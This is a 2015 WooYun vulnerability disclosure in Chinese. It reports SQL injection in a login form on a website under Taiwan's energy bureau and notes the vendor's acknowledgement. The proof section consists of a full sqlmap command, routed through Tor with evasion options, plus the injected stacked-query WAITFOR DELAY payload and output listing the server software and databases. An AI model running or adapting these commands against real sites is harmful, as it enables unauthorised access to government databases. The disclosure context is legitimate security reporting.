当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164365

漏洞标题:台湾能源局某下属网站SQL注入(臺灣地區)

相关厂商:台湾能源局

漏洞作者: 路人甲

提交时间:2015-12-28 16:50

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

台湾能源局某下属网站SQL注入

详细说明:

台湾能源局某下属网站SQL注入

漏洞证明:

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N --answers="extending=N,skip=Y,follow=N,quite=Y" -u "http://**.**.**.**/ecem_asso/" --data="__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTQwNTQzMTk4MA9kFgICAw9kFgYCBQ8QZGQWAWZkAgkPEA8WAh4HVmlzaWJsZWhkZBYBZmQCDw8PZBYCHgdvbmNsaWNrBTBpZiAoISBkb1N1Ym1pdF9mcm1FSU1TTG9naW4oKSApIHsgcmV0dXJuIGZhbHNlO31kZALxmJ1YEFq4ivnUluJI1nUJrL75d3qwcYqyZscxDHIp&__VIEWSTATEGENERATOR=6E1E6603&__EVENTVALIDATION=%2FwEdAB8kaUtvws8kuBYkiJrbC%2BesFq29negq3mFOYTR8%2BP4sFTjhKKHG2qB%2BY3b%2F8oYsoWLtp%2Fq7o0m9FwzaEv5l1JtJK040%2FqUXLXKzoT80wjcF9Y3u%2BAJmPgphVLZT7HLCdIm3Ksf7tj7DvOUdnd6fBQQC45Tl%2BiojsHBTvMKGfsKZsJEKG5y%2BAFtkZSp%2B3QCkDest7MC%2FTgmrTYIipoRtPxxtB%2F4uQrMGpJash3cgN6yZBp1dKqBCNHLdsimx%2Bz7g74ytqCtQuD01aSHJ%2Fnxvzwf7a576RE1p6cVH%2FWXAQGs2jxYvD7Qn6Ja1%2BdHEwjrcqgqNERGAi%2BNI%2FwTj0aYXsMUu4mgoVbgFFQNR%2BpKoDk16hNoxF%2BBihsROkNr5LB5sSR6LBAa0ngbr5fex4dUdMmhbJ%2FgdCCW%2B7DJkGNELFCvkSzF4AOndOF2NDl10RA2Prpm1Y%2FefEHqaqawbtB4Tpo9%2FLkqBTcsvJUaHreQ7YGYdY4QOPrM%2BVVhYPNmth5fVm3BQqdjCf%2BVXNT%2FEZ48lxSYemnUahPp24FK6dtoPMNqk6omAuZEtt0CFpueXC6bs4UaEqfUo8mOBjC3EOJUIh8fZvEfHoYPOiZ9lKvSuy0LNaPxOv8PS1Ci7hkfQYwhz%2B50cJKkGLgf49a0tat20Lfpof9vGMsSB3IwqFbCofXtH3hcP0QEONvxTat9Ca67s5YQ%3D&hidCasekind=A&CASE_KIND=A&DpLstUSER=313310100K&wtxtID=1111&wtxtPW=1111&wbtnLogin=%E7%99%BB%E5%85%A5%E7%B3%BB%E7%B5%B1" --dbs
---
Parameter: wtxtID (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTQwNTQzMTk4MA9kFgICAw9kFggCBQ8QZGQWAWZkAgkPEA8WAh4HVmlzaWJsZWhkZBYBZmQCDw8PZBYCHgdvbmNsaWNrBTBpZiAoISBkb1N1Ym1pdF9mcm1FSU1TTG9naW4oKSApIHsgcmV0dXJuIGZhbHNlO31kAhEPDxYEHgRUZXh0BSfluLPomZ/miJblr4bnorzmnInoqqQs6KuL6YeN5paw6Ly45YWlISEfAGdkZGRMdKi5vKHKmaBvWMuidPzU0GBkoX583TjOQDdomZjKdw==&__VIEWSTATEGENERATOR=6E1E6603&__EVENTVALIDATION=/wEdAB/X6LULhkFGnnlXS7C//6DkFq29negq3mFOYTR8+P4sFTjhKKHG2qB+Y3b/8oYsoWLtp/q7o0m9FwzaEv5l1JtJK040/qUXLXKzoT80wjcF9Y3u+AJmPgphVLZT7HLCdIm3Ksf7tj7DvOUdnd6fBQQC45Tl+iojsHBTvMKGfsKZsJEKG5y+AFtkZSp+3QCkDest7MC/TgmrTYIipoRtPxxtB/4uQrMGpJash3cgN6yZBp1dKqBCNHLdsimx+z7g74ytqCtQuD01aSHJ/nxvzwf7a576RE1p6cVH/WXAQGs2jxYvD7Qn6Ja1+dHEwjrcqgqNERGAi+NI/wTj0aYXsMUu4mgoVbgFFQNR+pKoDk16hNoxF+BihsROkNr5LB5sSR6LBAa0ngbr5fex4dUdMmhbJ/gdCCW+7DJkGNELFCvkSzF4AOndOF2NDl10RA2Prpm1Y/efEHqaqawbtB4Tpo9/LkqBTcsvJUaHreQ7YGYdY4QOPrM+VVhYPNmth5fVm3BQqdjCf+VXNT/EZ48lxSYemnUahPp24FK6dtoPMNqk6omAuZEtt0CFpueXC6bs4UaEqfUo8mOBjC3EOJUIh8fZvEfHoYPOiZ9lKvSuy0LNaPxOv8PS1Ci7hkfQYwhz+50cJKkGLgf49a0tat20Lfpolal2RxYlI0PC5UNVhyyEyJ7oSroYnTAh+hHc80EK9dI=&hidCasekind=A&CASE_KIND=A&DpLstUSER=313310100K&wtxtID=1111';WAITFOR DELAY '0:0:20'--&wtxtPW=1111&wbtnLogin=%E7%99%BB%E5%85%A5%E7%B3%BB%E7%B5%B1
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
available databases [6]:
[*] EBDB
[*] master
[*] model
[*] msdb
[*] OGDB
[*] tempdb

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-30 17:48

厂商回复:

感謝通報

最新状态:

暂无